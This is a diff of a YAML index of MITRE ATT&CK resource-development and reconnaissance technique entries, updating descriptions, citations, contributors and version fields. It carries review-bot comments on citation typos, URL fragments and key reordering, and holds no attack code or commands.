- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.568Z'
name: Obtain Capabilities
description: |-
Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -53677,22 +54292,66 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- 'Malware Repository: Malware Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ created: '2020-10-01T01:56:24.776Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588
+ external_id: T1588
+ - source_name: PegasusCitizenLab
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ - source_name: FireEyeSupplyChain
+ description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+ SunshopFireEye. Retrieved March 6, 2017.'
+ url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1650:
technique:
@@ -53755,37 +54414,38 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.007:
technique:
- modified: '2022-10-20T21:19:57.555Z'
+ modified: '2024-10-03T14:18:34.045Z'
name: Serverless
description: "Adversaries may compromise serverless cloud infrastructure, such
- as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
- By utilizing serverless infrastructure, adversaries can make it more difficult
- to attribute infrastructure used during operations back to them. \n\nOnce
- compromised, the serverless runtime environment can be leveraged to either
- respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+ as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+ can be used during targeting. By utilizing serverless infrastructure, adversaries
+ can make it more difficult to attribute infrastructure used during operations
+ back to them. \n\nOnce compromised, the serverless runtime environment can
+ be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
traffic to an adversary-owned command and control server.(Citation: BlackWater
- Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
- by these functions will appear to come from subdomains of common cloud providers,
- it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+ Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+ Apps Script Abuse 2021) As traffic generated by these functions will appear
+ to come from subdomains of common cloud providers, it may be difficult to
+ distinguish from ordinary traffic to these providers - making it easier to
+ [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
Workers)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
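Review bot: the `x_mitre_version` bump from '1.0' to '1.1' correctly accompanies the description change (Google Apps Script added alongside Cloudflare Workers and AWS Lambda, the new `GWS Apps Script Abuse 2021` citation, and the link to T1665), but `x_mitre_detection: ''` stays empty and `x_mitre_data_sources` still lists only 'Internet Scan: Response Content', so the new provider arrives with no detection guidance; also "these providers - making it easier" uses a spaced hyphen where the surrounding description text uses none.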
@@ -53809,11 +54469,14 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.004:
technique:
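Review bot: the new `GWS Apps Script Abuse 2021` reference URL ends in `#google_vignette`, which is an ad-overlay fragment added by the browser session that retrieved the page, not part of the article's identifier; strip the fragment so the `url` matches the canonical BleepingComputer address and deduplicates against any other reference to the same article.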
@@ -53871,17 +54534,18 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.006:
technique:
- modified: '2023-03-13T20:35:52.302Z'
+ modified: '2024-08-14T15:03:56.383Z'
name: SEO Poisoning
description: |-
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
+ In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
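Review bot: the added paragraph cites `(Citation: Chexmarx-seo)`, a misspelling of Checkmarx (the sibling citation in the same sentence is `Checkmarx-oss-seo`); it resolves only because the `external_references` entry added later in this change carries the same misspelled `source_name`, so both should be corrected together to `Checkmarx-seo`. Two smaller points on the same lines: "popularity(Citation: Chexmarx-seo) which may" needs a space or punctuation before the citation, and the added blank line between this paragraph and "Adversaries may also purchase..." is inconsistent with the rest of this block scalar, where paragraphs are separated by a single newline.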
@@ -53889,7 +54553,7 @@ resource-development:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Vijay Lalwani
- Will Thomas, Equinix Threat Analysis Center (ETAC)
- Will Jolliffe
@@ -53903,7 +54567,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -53936,11 +54600,18 @@ resource-development:
description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
September 30, 2022.
url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+ - source_name: Chexmarx-seo
+ description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+ the Star Ranking Game. Retrieved June 18, 2024.'
+ url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+ - source_name: Checkmarx-oss-seo
+ description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+ Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+ url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.003:
technique:
@@ -53962,7 +54633,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:19:50.018Z'
name: Code Signing Certificates
description: |-
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -53980,47 +54651,10 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
- type: attack-pattern
- created: '2020-10-01T01:30:00.877Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1587
- url: https://attack.mitre.org/techniques/T1587
- - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
- description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
- Units. Retrieved July 18, 2016.
- source_name: Mandiant APT1
- - source_name: Kaspersky Sofacy
- description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
- 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
- December 10, 2015.
- url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- - source_name: Bitdefender StrongPity June 2020
- url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
- Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- - source_name: Talos Promethium June 2020
- url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
- reach with StrongPity3 APT. Retrieved July 20, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:31:17.270Z'
name: Develop Capabilities
description: |-
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -54029,21 +54663,57 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ created: '2020-10-01T01:30:00.877Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1587
+ external_id: T1587
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Mandiant APT1
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ - source_name: Talos Promethium June 2020
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ - source_name: Bitdefender StrongPity June 2020
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1588.005:
technique:
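Review bot: `spec_version: '2.1'` is dropped from T1587 in this hunk (and from every other technique in the diff) with no replacement, while x_mitre_attack_spec_version goes from 2.1.0 to 3.2.0 and `revoked: false` / `x_mitre_deprecated: false` are added. Anything downstream of this index that keys on spec_version now has to use x_mitre_attack_spec_version instead, so the field removal deserves a mention in the PR description. The rest of the hunk is key reordering rather than data loss: the platforms, domains, object_marking_refs, id, created and external_references lines removed in the previous hunk reappear here with identical values, only the order of the reference entries changes.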
@@ -54083,7 +54753,7 @@ resource-development:
description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:14:01.255Z'
name: Exploits
description: |-
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -54102,15 +54772,13 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.001:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-24T15:10:40.270Z'
name: Domains
description: |-
- Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+ Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
@@ -54118,19 +54786,19 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Jeremy Galloway
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.3'
- x_mitre_contributors:
- - Jeremy Galloway
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -54164,55 +54832,64 @@ resource-development:
url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
reconnaissance:
T1592:
technique:
- x_mitre_platforms:
- - PRE
+ modified: '2024-10-03T19:35:07.269Z'
+ name: Gather Victim Host Information
+ description: |-
+ Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ x_mitre_contributors:
+ - Sam Seabrook, Duke Energy
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Internet Scan: Response Content'
type: attack-pattern
+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
created: '2020-10-02T16:39:33.966Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1592
url: https://attack.mitre.org/techniques/T1592
+ external_id: T1592
- source_name: ATT ScanBox
- url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ - source_name: TrellixQakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved August 1, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: Gather Victim Host Information
- description: |-
- Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
- Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: reconnaissance
- x_mitre_detection: |-
- Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.1'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1596.003:
technique:
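Review bot: most of the churn in this hunk for T1592 is key reordering rather than content. The ThreatConnect reference's `url` line is removed at one point and re-added further down only because `description` and `url` swapped order, and the whole name/description/kill_chain_phases/x_mitre_detection block is deleted and re-inserted verbatim above its old position. If the generator can emit mapping keys in a fixed order, the next upstream refresh would reduce to the real changes, which here are the new User-Agent paragraph in the description with its matching TrellixQakbot reference, the added contributor, `revoked: false`, and x_mitre_version 1.1 -> 1.2. Those are consistent with each other (a new citation, a new external_reference, a version bump), so the content side needs no change.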
@@ -54237,7 +54914,7 @@ reconnaissance:
url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
from Server (Site URL). Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:48:37.628Z'
name: Digital Certificates
description: |-
